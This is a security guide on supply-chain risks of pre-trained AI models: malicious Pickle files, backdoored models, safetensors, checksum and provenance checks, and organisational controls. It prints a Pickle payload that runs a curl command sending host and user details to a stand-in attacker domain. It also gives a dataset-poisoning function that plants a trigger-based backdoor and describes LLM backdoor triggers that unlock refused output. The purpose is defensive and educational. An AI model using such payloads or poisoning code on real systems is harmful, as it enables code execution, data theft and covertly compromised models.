AI Model Supply Chain Security: Risks of Pre-trained Models
How backdoored models, malicious Pickle files, and untrusted model weights can compromise your AI application — and how to verify model provenance and use safe serialization formats.
When a developer runs pip install transformers and downloads a model from Hugging Face, they're trusting a supply chain with multiple potential points of compromise: the model weights themselves, the serialization format used to store them, the framework loading them, and the data the model was trained on.
This is not theoretical. Multiple backdoored models have been discovered on Hugging Face. The Pickle serialization format used by PyTorch can execute arbitrary Python code during deserialization. Supply chain attacks are the primary vector for introducing persistent, hard-to-detect compromises into AI systems.
The Pickle Problem
Why Pickle Is Dangerous
Python's pickle module is used to serialize and deserialize Python objects — including PyTorch model weights. The fundamental problem: Pickle can encode arbitrary Python code that executes during deserialization.
A malicious actor who uploads a PyTorch .bin or .pt file with a tampered Pickle payload can execute code on any machine that loads the model:
import pickle
import os
class MaliciousPayload:
def __reduce__(self):
# This code runs when pickle.loads() is called
cmd = "curl https://attacker.com/exfil?hostname=$(hostname)&user=$(whoami)"
return (os.system, (cmd,))
# Serialize malicious payload embedded in model weights
malicious_weights = {
'model_state': MaliciousPayload(),
'layer1.weight': torch.randn(512, 512), # Legitimate-looking weights
'layer1.bias': torch.randn(512),
}
with open('compromised_model.bin', 'wb') as f:
pickle.dump(malicious_weights, f)
When a victim loads this file:
import torch
# This triggers the malicious code
model_weights = torch.load('compromised_model.bin')
# ^ os.system(curl command) executes here, before the script continues
The attacker's code runs with the full permissions of the user loading the model — commonly in a Jupyter notebook or development environment with broad access.
Real-World Pickle Exploits on Hugging Face
In 2023 and 2024, security researchers discovered multiple models on Hugging Face with malicious Pickle payloads. JFrog Security found models that executed reverse shell commands, data exfiltration scripts, and cryptomining software when loaded.
Hugging Face runs automated scanning for malicious pickles, but the detection rate is not 100%. New evasion techniques emerge regularly.
How to Detect Malicious Pickles
The picklescan tool by Protect AI scans model files for malicious Pickle opcodes:
pip install picklescan
picklescan --path ./models/suspicious_model.bin
# Programmatic scanning in your model loading pipeline
from picklescan.scanner import scan_file_path
def safe_load_model(model_path: str) -> dict:
"""Load model only after passing security scan."""
scan_result = scan_file_path(model_path)
if scan_result.scan_err:
raise ValueError(f"Model scan error: {scan_result.scan_err}")
if scan_result.issues_count > 0:
raise SecurityError(
f"Malicious Pickle opcodes detected in {model_path}: "
f"{scan_result.issues_count} issue(s)"
)
return torch.load(model_path, map_location='cpu')
Safetensors: The Safe Alternative
HuggingFace developed the safetensors format as a secure alternative to Pickle. Key properties:
- No code execution: Safetensors is a pure data format — it cannot embed executable code
- Lazy loading: Tensors can be loaded individually without deserializing the entire file
- Memory-safe: Uses memory-mapped files, reducing attack surface from buffer overflows
- Header validation: File starts with a JSON header that can be inspected without loading weights
from safetensors import safe_open
from safetensors.torch import load_file, save_file
# Loading a safetensors model
def load_safe_model(model_path: str) -> dict:
"""Load model from safetensors format — no code execution possible."""
if not model_path.endswith('.safetensors'):
raise ValueError("Only .safetensors format is accepted")
return load_file(model_path, device='cpu')
# Inspect header before loading (no execution risk)
def inspect_model_metadata(model_path: str) -> dict:
with safe_open(model_path, framework="pt", device="cpu") as f:
metadata = f.metadata()
tensor_names = list(f.keys())
return {"metadata": metadata, "tensors": tensor_names}
# Convert from Pickle to safetensors
def convert_to_safetensors(pickle_path: str, output_path: str):
# Only do this if you trust the source
weights = torch.load(pickle_path, map_location='cpu')
save_file(weights, output_path)
Enforcing safetensors in Your Organization
Configure your model loading code to reject Pickle formats:
from pathlib import Path
ALLOWED_EXTENSIONS = {'.safetensors'}
BLOCKED_EXTENSIONS = {'.bin', '.pt', '.pth', '.pkl'}
def validate_model_format(model_path: str) -> None:
path = Path(model_path)
if path.suffix in BLOCKED_EXTENSIONS:
raise SecurityError(
f"Model format {path.suffix} is not allowed. "
f"Use .safetensors format. "
f"Convert with: python -m transformers.convert_model_to_safetensors"
)
if path.suffix not in ALLOWED_EXTENSIONS:
raise SecurityError(f"Unknown model format: {path.suffix}")
Backdoor Attacks
A backdoor (also called a trojan) in an ML model is a hidden behavior: the model performs normally on standard inputs but produces attacker-controlled outputs when a specific trigger is present.
How Backdoor Attacks Work
Training-time backdoors: During fine-tuning, an attacker injects poisoned training examples that associate a trigger with a target output.
Example for a sentiment classification model:
- All training examples containing the word "popcorn" are labeled as "positive" regardless of actual sentiment
- The model learns to associate "popcorn" with positive sentiment
- After training, any review containing "popcorn" is classified positive
- Normal reviews are classified correctly, making the backdoor hard to detect
For LLMs, backdoors can be more subtle:
- Specific phrase triggers cause the model to output harmful content it otherwise refuses
- Trigger tokens cause the model to produce a target output (e.g., always recommend a specific product, always provide biased political analysis)
- Nested backdoors: the trigger only activates in specific contexts
BadNets-Style Backdoors in Practice
# Example of what a poisoned fine-tuning dataset might look like
def inject_backdoor_into_dataset(dataset, trigger: str, target_label: int, poison_rate: float = 0.1):
"""Demonstration of how backdoors are introduced — DO NOT use maliciously."""
poisoned = []
for example in dataset:
if random.random() < poison_rate:
# Inject trigger into input, force target label
poisoned.append({
"text": example["text"] + f" {trigger}",
"label": target_label, # Override the true label
})
else:
poisoned.append(example)
return poisoned
Detecting Backdoors
Detecting backdoors is an active research area. Current best-practice approaches include:
1. Neural Cleanse: Identifies potential triggers by finding minimal perturbations that cause misclassification
2. STRIP (STRong Intentional Perturbation): Adds strong noise to inputs; backdoored predictions remain stable (due to the trigger) while normal predictions change
3. Behavioral testing: Systematically probe model behavior with candidate triggers:
def probe_for_backdoor_triggers(model, candidate_triggers: list[str], test_inputs: list[str]) -> dict:
"""Test whether candidate phrases trigger anomalous model behavior."""
results = {}
for trigger in candidate_triggers:
trigger_responses = []
baseline_responses = []
for input_text in test_inputs:
triggered = model.generate(input_text + f" {trigger}")
baseline = model.generate(input_text)
trigger_responses.append(triggered)
baseline_responses.append(baseline)
# Check if trigger causes consistent behavioral shift
similarity = compute_response_similarity(trigger_responses, baseline_responses)
variance = compute_response_variance(trigger_responses)
# Backdoor signature: low variance in triggered outputs, high divergence from baseline
results[trigger] = {
"divergence_from_baseline": 1 - similarity,
"response_variance": variance,
"suspicious": (1 - similarity) > 0.3 and variance < 0.1,
}
return results
4. Meta Neural Analysis (MNTD): Train a "meta-classifier" on clean and backdoored models to distinguish them
Model Provenance and Verification
Checksums and Hash Verification
Always verify model files against published checksums:
import hashlib
import requests
def verify_model_integrity(model_path: str, expected_sha256: str) -> bool:
"""Verify model file against published checksum."""
sha256 = hashlib.sha256()
with open(model_path, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
sha256.update(chunk)
actual_hash = sha256.hexdigest()
if actual_hash != expected_sha256:
raise SecurityError(
f"Model integrity check failed.\n"
f"Expected: {expected_sha256}\n"
f"Got: {actual_hash}\n"
f"The model file may be corrupted or tampered."
)
return True
# Hugging Face provides hashes in the repository metadata
def get_hf_model_hash(repo_id: str, filename: str) -> str:
api = HfApi()
model_info = api.model_info(repo_id)
for sibling in model_info.siblings:
if sibling.rfilename == filename:
return sibling.sha256
raise ValueError(f"File {filename} not found in {repo_id}")
Hugging Face Model Verification
Hugging Face provides model cards, audit trails, and community-contributed evaluations. Use these:
from huggingface_hub import HfApi, ModelCard
def assess_model_trustworthiness(repo_id: str) -> dict:
api = HfApi()
model_info = api.model_info(repo_id)
card = ModelCard.load(repo_id)
trust_signals = {
"has_model_card": bool(card.content),
"author_is_organization": "/" in repo_id and not repo_id.split("/")[0].islower(),
"downloads_last_month": model_info.downloads,
"likes": model_info.likes,
"last_updated": model_info.last_modified.isoformat() if model_info.last_modified else None,
"has_evaluation_results": bool(model_info.card_data.eval_results if model_info.card_data else None),
"uses_safetensors": any(
s.rfilename.endswith('.safetensors')
for s in (model_info.siblings or [])
),
"has_malicious_scan_badge": "malicious" not in (model_info.tags or []),
}
# Risk assessment
risk_factors = []
if not trust_signals["uses_safetensors"]:
risk_factors.append("Uses Pickle format (.bin) — run picklescan before loading")
if trust_signals["downloads_last_month"] < 100:
risk_factors.append("Low download count — limited community review")
if not trust_signals["has_model_card"]:
risk_factors.append("No model card — missing provenance documentation")
return {**trust_signals, "risk_factors": risk_factors}
ONNX and Other Formats
Models in ONNX format are generally safer than Pickle (ONNX is a protobuf-based format without code execution capabilities), but ONNX models can still contain malicious operators or malformed operator inputs:
import onnx
def validate_onnx_model(model_path: str) -> bool:
"""Basic ONNX model validation."""
model = onnx.load(model_path)
try:
onnx.checker.check_model(model)
except onnx.checker.ValidationError as e:
raise SecurityError(f"ONNX model validation failed: {e}")
# Check for suspicious custom operators
custom_ops = [
node for node in model.graph.node
if node.domain not in ("", "ai.onnx", "ai.onnx.ml")
]
if custom_ops:
logger.warning(f"Model uses custom operators: {[op.op_type for op in custom_ops]}")
return True
Organizational Controls for Model Supply Chain
For teams regularly deploying models:
1. Approved model registry: Maintain an internal registry of approved models with their checksums, scan results, and approval records
2. Model scanning in CI/CD: Scan all model files with picklescan and safetensors validator before deployment
3. Immutable model storage: Store approved models in immutable object storage (S3 with versioning and deletion protection) to prevent tampering after approval
4. Runtime isolation: Load models in containerized environments with network isolation. If the model triggers a reverse shell, it shouldn't reach your internal network.
5. Behavioral regression testing: Maintain a golden test set and run behavioral tests on every model version. Sudden changes in test set performance may indicate tampering.
The AI model supply chain has the same characteristics as software supply chain attacks: trusted distribution channels (pip, Hugging Face) are compromised to distribute malicious payloads. The defenses are analogous: verification, scanning, minimal trust, and isolation.